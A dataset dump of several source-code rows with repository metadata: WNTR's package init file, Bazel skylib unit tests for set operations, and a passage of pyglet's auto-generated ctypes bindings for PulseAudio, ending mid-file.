Dataset schema (one row per source file):

| column | dtype | values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 4 – 1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4–209 |
| max_stars_repo_name | string | length 5–121 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | length 1–10 |
| max_stars_count | int64 | 1 – 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 4–209 |
| max_issues_repo_name | string | length 5–121 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | length 1–10 |
| max_issues_count | int64 | 1 – 67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 4–209 |
| max_forks_repo_name | string | length 5–121 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | length 1–10 |
| max_forks_count | int64 | 1 – 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 4 – 1.02M |
| avg_line_length | float64 | 1.07 – 66.1k |
| max_line_length | int64 | 4 – 266k |
| alphanum_fraction | float64 | 0.01 – 1 |
---

hexsha: a48c58e9f1de07ae64acb88a2d38d018da133288 | size: 525 | ext: py | lang: Python
max_stars: path=wntr/__init__.py, repo=algchyhao/WNTR, head=dd4db188a8641a4da16cf80a1557c908fa48c17d, licenses=["BSD-3-Clause"], count=null, events=null..null
max_issues: path=wntr/__init__.py, repo=algchyhao/WNTR, head=dd4db188a8641a4da16cf80a1557c908fa48c17d, licenses=["BSD-3-Clause"], count=null, events=null..null
max_forks: path=wntr/__init__.py, repo=algchyhao/WNTR, head=dd4db188a8641a4da16cf80a1557c908fa48c17d, licenses=["BSD-3-Clause"], count=null, events=null..null
content:
from wntr import epanet
from wntr import network
from wntr import morph
from wntr import metrics
from wntr import sim
from wntr import scenario
from wntr import graphics
from wntr import utils
__version__ = '0.1.7'
__copyright__ = """Copyright 2015-2019 National Technology & Engineering
Solutions of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525
with NTESS, the U.S. Government retains certain rights in this software."""
__license__ = "Revised BSD License"
from wntr.utils.logger import start_logging
avg_line_length: 27.631579 | max_line_length: 75 | alphanum_fraction: 0.794286
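The `wntr/__init__.py` above only wires up WNTR's subpackages and package metadata. As a hedged illustration of what those subpackages do together, here is a minimal simulation sketch against the standard WNTR entry points of the 0.1.x era (the INP path is a placeholder):

```python
import wntr

# Load an EPANET INP file into a water network model (placeholder path).
wn = wntr.network.WaterNetworkModel('networks/Net3.inp')

# Run a hydraulic simulation using the EPANET engine exposed by wntr.sim.
sim = wntr.sim.EpanetSimulator(wn)
results = sim.run_sim()

# Node pressures are indexed by timestep and node name.
print(results.node['pressure'].head())
```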
---

hexsha: 127167355cbe343d0f2cc6796ef9bd9083343d76 | size: 42 | ext: py | lang: Python
max_stars: path=test_pyramids/__init__.py, repo=leomauro/pyramids, head=4f7a8e97e13a5ee0b037dc528e5ba72f31ac36e5, licenses=["MIT"], count=9, events=2015-09-04T22:33:40.000Z..2019-04-11T14:05:11.000Z
max_issues: path=test_pyramids/__init__.py, repo=leomauro/pyramids, head=4f7a8e97e13a5ee0b037dc528e5ba72f31ac36e5, licenses=["MIT"], count=2, events=2015-09-04T22:31:44.000Z..2017-07-29T04:11:53.000Z
max_forks: path=test_pyramids/__init__.py, repo=hosford42/pyramids, head=4f7a8e97e13a5ee0b037dc528e5ba72f31ac36e5, licenses=["MIT"], count=3, events=2015-10-14T12:41:26.000Z..2022-01-08T19:43:47.000Z
content:
"""Test suite for the Pyramids parser."""
avg_line_length: 21 | max_line_length: 41 | alphanum_fraction: 0.690476
---

hexsha: 7f84260de4df365fe7b095a1829bc82091a286e4 | size: 5,500 | ext: bzl | lang: Python
max_stars: path=tests/sets_tests.bzl, repo=laszlocsomor/bazel-skylib, head=f4a2bae427c4958af834c34624767b0144f7ab12, licenses=["Apache-2.0"], count=null, events=null..null
max_issues: path=tests/sets_tests.bzl, repo=laszlocsomor/bazel-skylib, head=f4a2bae427c4958af834c34624767b0144f7ab12, licenses=["Apache-2.0"], count=null, events=null..null
max_forks: path=tests/sets_tests.bzl, repo=laszlocsomor/bazel-skylib, head=f4a2bae427c4958af834c34624767b0144f7ab12, licenses=["Apache-2.0"], count=null, events=null..null
content:
# Copyright 2017 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for sets.bzl."""
load("//lib:sets.bzl", "sets")
load("//lib:unittest.bzl", "asserts", "unittest")
def _is_equal_test(ctx):
    """Unit tests for sets.is_equal."""

    # Note that if this test fails, the results for the other `sets` tests will
    # be inconclusive because they use `asserts.set_equals`, which in turn calls
    # `sets.is_equal`.
    env = unittest.begin(ctx)

    asserts.true(env, sets.is_equal([], []))
    asserts.false(env, sets.is_equal([], [1]))
    asserts.false(env, sets.is_equal([1], []))
    asserts.true(env, sets.is_equal([1], [1]))
    asserts.false(env, sets.is_equal([1], [1, 2]))
    asserts.false(env, sets.is_equal([1], [2]))
    asserts.false(env, sets.is_equal([1], depset([1, 2])))

    # Verify that the implementation is not using == on the sets directly.
    asserts.true(env, sets.is_equal(depset([1]), depset([1])))

    # If passing a list, verify that duplicate elements are ignored.
    asserts.true(env, sets.is_equal([1, 1], [1]))

    unittest.end(env)

is_equal_test = unittest.make(_is_equal_test)

def _is_subset_test(ctx):
    """Unit tests for sets.is_subset."""
    env = unittest.begin(ctx)

    asserts.true(env, sets.is_subset([], []))
    asserts.true(env, sets.is_subset([], [1]))
    asserts.false(env, sets.is_subset([1], []))
    asserts.true(env, sets.is_subset([1], [1]))
    asserts.true(env, sets.is_subset([1], [1, 2]))
    asserts.false(env, sets.is_subset([1], [2]))
    asserts.true(env, sets.is_subset([1], depset([1, 2])))

    # If passing a list, verify that duplicate elements are ignored.
    asserts.true(env, sets.is_subset([1, 1], [1, 2]))

    unittest.end(env)

is_subset_test = unittest.make(_is_subset_test)

def _disjoint_test(ctx):
    """Unit tests for sets.disjoint."""
    env = unittest.begin(ctx)

    asserts.true(env, sets.disjoint([], []))
    asserts.true(env, sets.disjoint([], [1]))
    asserts.true(env, sets.disjoint([1], []))
    asserts.false(env, sets.disjoint([1], [1]))
    asserts.false(env, sets.disjoint([1], [1, 2]))
    asserts.true(env, sets.disjoint([1], [2]))
    asserts.true(env, sets.disjoint([1], depset([2])))

    # If passing a list, verify that duplicate elements are ignored.
    asserts.false(env, sets.disjoint([1, 1], [1, 2]))

    unittest.end(env)

disjoint_test = unittest.make(_disjoint_test)

def _intersection_test(ctx):
    """Unit tests for sets.intersection."""
    env = unittest.begin(ctx)

    asserts.set_equals(env, [], sets.intersection([], []))
    asserts.set_equals(env, [], sets.intersection([], [1]))
    asserts.set_equals(env, [], sets.intersection([1], []))
    asserts.set_equals(env, [1], sets.intersection([1], [1]))
    asserts.set_equals(env, [1], sets.intersection([1], [1, 2]))
    asserts.set_equals(env, [], sets.intersection([1], [2]))
    asserts.set_equals(env, [1], sets.intersection([1], depset([1])))

    # If passing a list, verify that duplicate elements are ignored.
    asserts.set_equals(env, [1], sets.intersection([1, 1], [1, 2]))

    unittest.end(env)

intersection_test = unittest.make(_intersection_test)

def _union_test(ctx):
    """Unit tests for sets.union."""
    env = unittest.begin(ctx)

    asserts.set_equals(env, [], sets.union())
    asserts.set_equals(env, [1], sets.union([1]))
    asserts.set_equals(env, [], sets.union([], []))
    asserts.set_equals(env, [1], sets.union([], [1]))
    asserts.set_equals(env, [1], sets.union([1], []))
    asserts.set_equals(env, [1], sets.union([1], [1]))
    asserts.set_equals(env, [1, 2], sets.union([1], [1, 2]))
    asserts.set_equals(env, [1, 2], sets.union([1], [2]))
    asserts.set_equals(env, [1], sets.union([1], depset([1])))

    # If passing a list, verify that duplicate elements are ignored.
    asserts.set_equals(env, [1, 2], sets.union([1, 1], [1, 2]))

    unittest.end(env)

union_test = unittest.make(_union_test)

def _difference_test(ctx):
    """Unit tests for sets.difference."""
    env = unittest.begin(ctx)

    asserts.set_equals(env, [], sets.difference([], []))
    asserts.set_equals(env, [], sets.difference([], [1]))
    asserts.set_equals(env, [1], sets.difference([1], []))
    asserts.set_equals(env, [], sets.difference([1], [1]))
    asserts.set_equals(env, [], sets.difference([1], [1, 2]))
    asserts.set_equals(env, [1], sets.difference([1], [2]))
    asserts.set_equals(env, [], sets.difference([1], depset([1])))

    # If passing a list, verify that duplicate elements are ignored.
    asserts.set_equals(env, [2], sets.difference([1, 2], [1, 1]))

    unittest.end(env)

difference_test = unittest.make(_difference_test)

def sets_test_suite():
    """Creates the test targets and test suite for sets.bzl tests."""
    unittest.suite(
        "sets_tests",
        disjoint_test,
        intersection_test,
        is_equal_test,
        is_subset_test,
        difference_test,
        union_test,
    )
avg_line_length: 35.714286 | max_line_length: 80 | alphanum_fraction: 0.651273
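The `sets_tests.bzl` file above only defines the `sets_test_suite` macro; a BUILD file still has to instantiate it. A sketch of the conventional wiring, following the skylib pattern of a `tests/BUILD` file next to this one:

```python
# tests/BUILD (sketch)
load(":sets_tests.bzl", "sets_test_suite")

sets_test_suite()
```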
---

hexsha: 981560558743d6475be801ad127fb7ab3420f72f | size: 118,322 | ext: py | lang: Python
max_stars: path=venv/Lib/site-packages/pyglet/media/drivers/pulse/lib_pulseaudio.py, repo=mintzer/pupillometry-rf-back, head=cfa86fa984a49dce0123798f8de5b838c02e10d5, licenses=["CC-BY-4.0"], count=null, events=null..null
max_issues: path=venv/Lib/site-packages/pyglet/media/drivers/pulse/lib_pulseaudio.py, repo=mintzer/pupillometry-rf-back, head=cfa86fa984a49dce0123798f8de5b838c02e10d5, licenses=["CC-BY-4.0"], count=null, events=null..null
max_forks: path=venv/Lib/site-packages/pyglet/media/drivers/pulse/lib_pulseaudio.py, repo=mintzer/pupillometry-rf-back, head=cfa86fa984a49dce0123798f8de5b838c02e10d5, licenses=["CC-BY-4.0"], count=null, events=null..null
content:
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# Copyright (c) 2008-2020 pyglet contributors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Wrapper for pulse
Generated with:
tools/genwrappers.py pulseaudio
Do not modify this file.
IMPORTANT: struct_timeval is incorrectly parsed by tools/genwrappers.py and
was manually edited in this file.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import ctypes
from ctypes import *
import pyglet.lib
_lib = pyglet.lib.load_library('pulse')
_int_types = (c_int16, c_int32)
if hasattr(ctypes, 'c_int64'):
    # Some builds of ctypes apparently do not have c_int64
    # defined; it's a pretty good bet that these builds do not
    # have 64-bit pointers.
    _int_types += (ctypes.c_int64,)
for t in _int_types:
    if sizeof(t) == sizeof(c_size_t):
        c_ptrdiff_t = t

class c_void(Structure):
    # c_void_p is a buggy return type, converting to int, so
    # POINTER(None) == c_void_p is actually written as
    # POINTER(c_void), so it can be treated as a real pointer.
    _fields_ = [('dummy', c_int)]
# /usr/include/pulse/version.h:40
pa_get_library_version = _lib.pa_get_library_version
pa_get_library_version.restype = c_char_p
pa_get_library_version.argtypes = []
PA_API_VERSION = 12 # /usr/include/pulse/version.h:46
PA_PROTOCOL_VERSION = 30 # /usr/include/pulse/version.h:50
PA_MAJOR = 6 # /usr/include/pulse/version.h:53
PA_MINOR = 0 # /usr/include/pulse/version.h:56
PA_MICRO = 0 # /usr/include/pulse/version.h:59
PA_CHANNELS_MAX = 32 # /usr/include/pulse/sample.h:128
PA_RATE_MAX = 192000 # /usr/include/pulse/sample.h:131
enum_pa_sample_format = c_int
PA_SAMPLE_U8 = 0
PA_SAMPLE_ALAW = 1
PA_SAMPLE_ULAW = 2
PA_SAMPLE_S16LE = 3
PA_SAMPLE_S16BE = 4
PA_SAMPLE_FLOAT32LE = 5
PA_SAMPLE_FLOAT32BE = 6
PA_SAMPLE_S32LE = 7
PA_SAMPLE_S32BE = 8
PA_SAMPLE_S24LE = 9
PA_SAMPLE_S24BE = 10
PA_SAMPLE_S24_32LE = 11
PA_SAMPLE_S24_32BE = 12
PA_SAMPLE_MAX = 13
PA_SAMPLE_INVALID = -1
pa_sample_format_t = enum_pa_sample_format # /usr/include/pulse/sample.h:179
class struct_pa_sample_spec(Structure):
    __slots__ = [
        'format',
        'rate',
        'channels',
    ]

struct_pa_sample_spec._fields_ = [
    ('format', pa_sample_format_t),
    ('rate', c_uint32),
    ('channels', c_uint8),
]
pa_sample_spec = struct_pa_sample_spec # /usr/include/pulse/sample.h:257
pa_usec_t = c_uint64 # /usr/include/pulse/sample.h:260
# /usr/include/pulse/sample.h:263
pa_bytes_per_second = _lib.pa_bytes_per_second
pa_bytes_per_second.restype = c_size_t
pa_bytes_per_second.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:266
pa_frame_size = _lib.pa_frame_size
pa_frame_size.restype = c_size_t
pa_frame_size.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:269
pa_sample_size = _lib.pa_sample_size
pa_sample_size.restype = c_size_t
pa_sample_size.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:273
pa_sample_size_of_format = _lib.pa_sample_size_of_format
pa_sample_size_of_format.restype = c_size_t
pa_sample_size_of_format.argtypes = [pa_sample_format_t]
# /usr/include/pulse/sample.h:278
pa_bytes_to_usec = _lib.pa_bytes_to_usec
pa_bytes_to_usec.restype = pa_usec_t
pa_bytes_to_usec.argtypes = [c_uint64, POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:283
pa_usec_to_bytes = _lib.pa_usec_to_bytes
pa_usec_to_bytes.restype = c_size_t
pa_usec_to_bytes.argtypes = [pa_usec_t, POINTER(pa_sample_spec)]
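# Editor's sketch (not part of the generated wrapper): with the bindings
# above, a 16-bit little-endian stereo spec at 44100 Hz behaves like this:
#
#     spec = pa_sample_spec()
#     spec.format = PA_SAMPLE_S16LE
#     spec.rate = 44100
#     spec.channels = 2
#     pa_bytes_per_second(byref(spec))       # 176400 = 44100 * 2 ch * 2 bytes
#     pa_frame_size(byref(spec))             # 4 bytes per frame
#     pa_bytes_to_usec(176400, byref(spec))  # 1000000 usec, i.e. one second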
# /usr/include/pulse/sample.h:288
pa_sample_spec_init = _lib.pa_sample_spec_init
pa_sample_spec_init.restype = POINTER(pa_sample_spec)
pa_sample_spec_init.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:291
#pa_sample_format_valid = _lib.pa_sample_format_valid
#pa_sample_format_valid.restype = c_int
#pa_sample_format_valid.argtypes = [c_uint]
# /usr/include/pulse/sample.h:294
#pa_sample_rate_valid = _lib.pa_sample_rate_valid
#pa_sample_rate_valid.restype = c_int
#pa_sample_rate_valid.argtypes = [c_uint32]
# /usr/include/pulse/sample.h:298
#pa_channels_valid = _lib.pa_channels_valid
#pa_channels_valid.restype = c_int
#pa_channels_valid.argtypes = [c_uint8]
# /usr/include/pulse/sample.h:301
pa_sample_spec_valid = _lib.pa_sample_spec_valid
pa_sample_spec_valid.restype = c_int
pa_sample_spec_valid.argtypes = [POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:304
pa_sample_spec_equal = _lib.pa_sample_spec_equal
pa_sample_spec_equal.restype = c_int
pa_sample_spec_equal.argtypes = [POINTER(pa_sample_spec), POINTER(pa_sample_spec)]
# /usr/include/pulse/sample.h:307
pa_sample_format_to_string = _lib.pa_sample_format_to_string
pa_sample_format_to_string.restype = c_char_p
pa_sample_format_to_string.argtypes = [pa_sample_format_t]
# /usr/include/pulse/sample.h:310
pa_parse_sample_format = _lib.pa_parse_sample_format
pa_parse_sample_format.restype = pa_sample_format_t
pa_parse_sample_format.argtypes = [c_char_p]
PA_SAMPLE_SPEC_SNPRINT_MAX = 32 # /usr/include/pulse/sample.h:317
# /usr/include/pulse/sample.h:320
pa_sample_spec_snprint = _lib.pa_sample_spec_snprint
pa_sample_spec_snprint.restype = c_char_p
pa_sample_spec_snprint.argtypes = [c_char_p, c_size_t, POINTER(pa_sample_spec)]
PA_BYTES_SNPRINT_MAX = 11 # /usr/include/pulse/sample.h:327
# /usr/include/pulse/sample.h:330
pa_bytes_snprint = _lib.pa_bytes_snprint
pa_bytes_snprint.restype = c_char_p
pa_bytes_snprint.argtypes = [c_char_p, c_size_t, c_uint]
# /usr/include/pulse/sample.h:334
pa_sample_format_is_le = _lib.pa_sample_format_is_le
pa_sample_format_is_le.restype = c_int
pa_sample_format_is_le.argtypes = [pa_sample_format_t]
# /usr/include/pulse/sample.h:338
pa_sample_format_is_be = _lib.pa_sample_format_is_be
pa_sample_format_is_be.restype = c_int
pa_sample_format_is_be.argtypes = [pa_sample_format_t]
enum_pa_context_state = c_int
PA_CONTEXT_UNCONNECTED = 0
PA_CONTEXT_CONNECTING = 1
PA_CONTEXT_AUTHORIZING = 2
PA_CONTEXT_SETTING_NAME = 3
PA_CONTEXT_READY = 4
PA_CONTEXT_FAILED = 5
PA_CONTEXT_TERMINATED = 6
pa_context_state_t = enum_pa_context_state # /usr/include/pulse/def.h:45
enum_pa_stream_state = c_int
PA_STREAM_UNCONNECTED = 0
PA_STREAM_CREATING = 1
PA_STREAM_READY = 2
PA_STREAM_FAILED = 3
PA_STREAM_TERMINATED = 4
pa_stream_state_t = enum_pa_stream_state # /usr/include/pulse/def.h:74
enum_pa_operation_state = c_int
PA_OPERATION_RUNNING = 0
PA_OPERATION_DONE = 1
PA_OPERATION_CANCELLED = 2
pa_operation_state_t = enum_pa_operation_state # /usr/include/pulse/def.h:102
enum_pa_context_flags = c_int
PA_CONTEXT_NOFLAGS = 0
PA_CONTEXT_NOAUTOSPAWN = 1
PA_CONTEXT_NOFAIL = 2
pa_context_flags_t = enum_pa_context_flags # /usr/include/pulse/def.h:122
enum_pa_direction = c_int
PA_DIRECTION_OUTPUT = 1
PA_DIRECTION_INPUT = 2
pa_direction_t = enum_pa_direction # /usr/include/pulse/def.h:137
enum_pa_device_type = c_int
PA_DEVICE_TYPE_SINK = 0
PA_DEVICE_TYPE_SOURCE = 1
pa_device_type_t = enum_pa_device_type # /usr/include/pulse/def.h:148
enum_pa_stream_direction = c_int
PA_STREAM_NODIRECTION = 0
PA_STREAM_PLAYBACK = 1
PA_STREAM_RECORD = 2
PA_STREAM_UPLOAD = 3
pa_stream_direction_t = enum_pa_stream_direction # /usr/include/pulse/def.h:161
enum_pa_stream_flags = c_int
PA_STREAM_NOFLAGS = 0
PA_STREAM_START_CORKED = 1
PA_STREAM_INTERPOLATE_TIMING = 2
PA_STREAM_NOT_MONOTONIC = 4
PA_STREAM_AUTO_TIMING_UPDATE = 8
PA_STREAM_NO_REMAP_CHANNELS = 16
PA_STREAM_NO_REMIX_CHANNELS = 32
PA_STREAM_FIX_FORMAT = 64
PA_STREAM_FIX_RATE = 128
PA_STREAM_FIX_CHANNELS = 256
PA_STREAM_DONT_MOVE = 512
PA_STREAM_VARIABLE_RATE = 1024
PA_STREAM_PEAK_DETECT = 2048
PA_STREAM_START_MUTED = 4096
PA_STREAM_ADJUST_LATENCY = 8192
PA_STREAM_EARLY_REQUESTS = 16384
PA_STREAM_DONT_INHIBIT_AUTO_SUSPEND = 32768
PA_STREAM_START_UNMUTED = 65536
PA_STREAM_FAIL_ON_SUSPEND = 131072
PA_STREAM_RELATIVE_VOLUME = 262144
PA_STREAM_PASSTHROUGH = 524288
pa_stream_flags_t = enum_pa_stream_flags # /usr/include/pulse/def.h:355
class struct_pa_buffer_attr(Structure):
    __slots__ = [
        'maxlength',
        'tlength',
        'prebuf',
        'minreq',
        'fragsize',
    ]

struct_pa_buffer_attr._fields_ = [
    ('maxlength', c_uint32),
    ('tlength', c_uint32),
    ('prebuf', c_uint32),
    ('minreq', c_uint32),
    ('fragsize', c_uint32),
]
pa_buffer_attr = struct_pa_buffer_attr # /usr/include/pulse/def.h:452
enum_pa_error_code = c_int
PA_OK = 0
PA_ERR_ACCESS = 1
PA_ERR_COMMAND = 2
PA_ERR_INVALID = 3
PA_ERR_EXIST = 4
PA_ERR_NOENTITY = 5
PA_ERR_CONNECTIONREFUSED = 6
PA_ERR_PROTOCOL = 7
PA_ERR_TIMEOUT = 8
PA_ERR_AUTHKEY = 9
PA_ERR_INTERNAL = 10
PA_ERR_CONNECTIONTERMINATED = 11
PA_ERR_KILLED = 12
PA_ERR_INVALIDSERVER = 13
PA_ERR_MODINITFAILED = 14
PA_ERR_BADSTATE = 15
PA_ERR_NODATA = 16
PA_ERR_VERSION = 17
PA_ERR_TOOLARGE = 18
PA_ERR_NOTSUPPORTED = 19
PA_ERR_UNKNOWN = 20
PA_ERR_NOEXTENSION = 21
PA_ERR_OBSOLETE = 22
PA_ERR_NOTIMPLEMENTED = 23
PA_ERR_FORKED = 24
PA_ERR_IO = 25
PA_ERR_BUSY = 26
PA_ERR_MAX = 27
pa_error_code_t = enum_pa_error_code # /usr/include/pulse/def.h:484
enum_pa_subscription_mask = c_int
PA_SUBSCRIPTION_MASK_NULL = 0
PA_SUBSCRIPTION_MASK_SINK = 1
PA_SUBSCRIPTION_MASK_SOURCE = 2
PA_SUBSCRIPTION_MASK_SINK_INPUT = 4
PA_SUBSCRIPTION_MASK_SOURCE_OUTPUT = 8
PA_SUBSCRIPTION_MASK_MODULE = 16
PA_SUBSCRIPTION_MASK_CLIENT = 32
PA_SUBSCRIPTION_MASK_SAMPLE_CACHE = 64
PA_SUBSCRIPTION_MASK_SERVER = 128
PA_SUBSCRIPTION_MASK_AUTOLOAD = 256
PA_SUBSCRIPTION_MASK_CARD = 512
PA_SUBSCRIPTION_MASK_ALL = 767
pa_subscription_mask_t = enum_pa_subscription_mask # /usr/include/pulse/def.h:554
enum_pa_subscription_event_type = c_int
PA_SUBSCRIPTION_EVENT_SINK = 0
PA_SUBSCRIPTION_EVENT_SOURCE = 1
PA_SUBSCRIPTION_EVENT_SINK_INPUT = 2
PA_SUBSCRIPTION_EVENT_SOURCE_OUTPUT = 3
PA_SUBSCRIPTION_EVENT_MODULE = 4
PA_SUBSCRIPTION_EVENT_CLIENT = 5
PA_SUBSCRIPTION_EVENT_SAMPLE_CACHE = 6
PA_SUBSCRIPTION_EVENT_SERVER = 7
PA_SUBSCRIPTION_EVENT_AUTOLOAD = 8
PA_SUBSCRIPTION_EVENT_CARD = 9
PA_SUBSCRIPTION_EVENT_FACILITY_MASK = 15
PA_SUBSCRIPTION_EVENT_NEW = 0
PA_SUBSCRIPTION_EVENT_CHANGE = 16
PA_SUBSCRIPTION_EVENT_REMOVE = 32
PA_SUBSCRIPTION_EVENT_TYPE_MASK = 48
pa_subscription_event_type_t = enum_pa_subscription_event_type # /usr/include/pulse/def.h:605
class struct_pa_timing_info(Structure):
    __slots__ = [
        'timestamp',
        'synchronized_clocks',
        'sink_usec',
        'source_usec',
        'transport_usec',
        'playing',
        'write_index_corrupt',
        'write_index',
        'read_index_corrupt',
        'read_index',
        'configured_sink_usec',
        'configured_source_usec',
        'since_underrun',
    ]

class struct_timeval(Structure):
    _fields_ = [("tv_sec", c_long),
                ("tv_usec", c_long)]

struct_pa_timing_info._fields_ = [
    ('timestamp', struct_timeval),
    ('synchronized_clocks', c_int),
    ('sink_usec', pa_usec_t),
    ('source_usec', pa_usec_t),
    ('transport_usec', pa_usec_t),
    ('playing', c_int),
    ('write_index_corrupt', c_int),
    ('write_index', c_int64),
    ('read_index_corrupt', c_int),
    ('read_index', c_int64),
    ('configured_sink_usec', pa_usec_t),
    ('configured_source_usec', pa_usec_t),
    ('since_underrun', c_int64),
]
pa_timing_info = struct_pa_timing_info # /usr/include/pulse/def.h:725
class struct_pa_spawn_api(Structure):
    __slots__ = [
        'prefork',
        'postfork',
        'atfork',
    ]

struct_pa_spawn_api._fields_ = [
    ('prefork', POINTER(CFUNCTYPE(None))),
    ('postfork', POINTER(CFUNCTYPE(None))),
    ('atfork', POINTER(CFUNCTYPE(None))),
]
pa_spawn_api = struct_pa_spawn_api # /usr/include/pulse/def.h:749
enum_pa_seek_mode = c_int
PA_SEEK_RELATIVE = 0
PA_SEEK_ABSOLUTE = 1
PA_SEEK_RELATIVE_ON_READ = 2
PA_SEEK_RELATIVE_END = 3
pa_seek_mode_t = enum_pa_seek_mode # /usr/include/pulse/def.h:764
enum_pa_sink_flags = c_int
PA_SINK_NOFLAGS = 0
PA_SINK_HW_VOLUME_CTRL = 1
PA_SINK_LATENCY = 2
PA_SINK_HARDWARE = 4
PA_SINK_NETWORK = 8
PA_SINK_HW_MUTE_CTRL = 16
PA_SINK_DECIBEL_VOLUME = 32
PA_SINK_FLAT_VOLUME = 64
PA_SINK_DYNAMIC_LATENCY = 128
PA_SINK_SET_FORMATS = 256
pa_sink_flags_t = enum_pa_sink_flags # /usr/include/pulse/def.h:829
enum_pa_sink_state = c_int
PA_SINK_INVALID_STATE = -1
PA_SINK_RUNNING = 0
PA_SINK_IDLE = 1
PA_SINK_SUSPENDED = 2
PA_SINK_INIT = -2
PA_SINK_UNLINKED = -3
pa_sink_state_t = enum_pa_sink_state # /usr/include/pulse/def.h:875
enum_pa_source_flags = c_int
PA_SOURCE_NOFLAGS = 0
PA_SOURCE_HW_VOLUME_CTRL = 1
PA_SOURCE_LATENCY = 2
PA_SOURCE_HARDWARE = 4
PA_SOURCE_NETWORK = 8
PA_SOURCE_HW_MUTE_CTRL = 16
PA_SOURCE_DECIBEL_VOLUME = 32
PA_SOURCE_DYNAMIC_LATENCY = 64
PA_SOURCE_FLAT_VOLUME = 128
pa_source_flags_t = enum_pa_source_flags # /usr/include/pulse/def.h:946
enum_pa_source_state = c_int
PA_SOURCE_INVALID_STATE = -1
PA_SOURCE_RUNNING = 0
PA_SOURCE_IDLE = 1
PA_SOURCE_SUSPENDED = 2
PA_SOURCE_INIT = -2
PA_SOURCE_UNLINKED = -3
pa_source_state_t = enum_pa_source_state # /usr/include/pulse/def.h:991
pa_free_cb_t = CFUNCTYPE(None, POINTER(None)) # /usr/include/pulse/def.h:1014
enum_pa_port_available = c_int
PA_PORT_AVAILABLE_UNKNOWN = 0
PA_PORT_AVAILABLE_NO = 1
PA_PORT_AVAILABLE_YES = 2
pa_port_available_t = enum_pa_port_available # /usr/include/pulse/def.h:1040
class struct_pa_mainloop_api(Structure):
    __slots__ = [
    ]
struct_pa_mainloop_api._fields_ = [
    ('_opaque_struct', c_int)
]

class struct_pa_mainloop_api(Structure):
    __slots__ = [
    ]
struct_pa_mainloop_api._fields_ = [
    ('_opaque_struct', c_int)
]
pa_mainloop_api = struct_pa_mainloop_api # /usr/include/pulse/mainloop-api.h:47
enum_pa_io_event_flags = c_int
PA_IO_EVENT_NULL = 0
PA_IO_EVENT_INPUT = 1
PA_IO_EVENT_OUTPUT = 2
PA_IO_EVENT_HANGUP = 4
PA_IO_EVENT_ERROR = 8
pa_io_event_flags_t = enum_pa_io_event_flags # /usr/include/pulse/mainloop-api.h:56
class struct_pa_io_event(Structure):
    __slots__ = [
    ]
struct_pa_io_event._fields_ = [
    ('_opaque_struct', c_int)
]

class struct_pa_io_event(Structure):
    __slots__ = [
    ]
struct_pa_io_event._fields_ = [
    ('_opaque_struct', c_int)
]
pa_io_event = struct_pa_io_event # /usr/include/pulse/mainloop-api.h:59
pa_io_event_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_io_event), c_int, pa_io_event_flags_t, POINTER(None)) # /usr/include/pulse/mainloop-api.h:61
pa_io_event_destroy_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_io_event), POINTER(None)) # /usr/include/pulse/mainloop-api.h:63
class struct_pa_time_event(Structure):
    __slots__ = [
    ]
struct_pa_time_event._fields_ = [
    ('_opaque_struct', c_int)
]
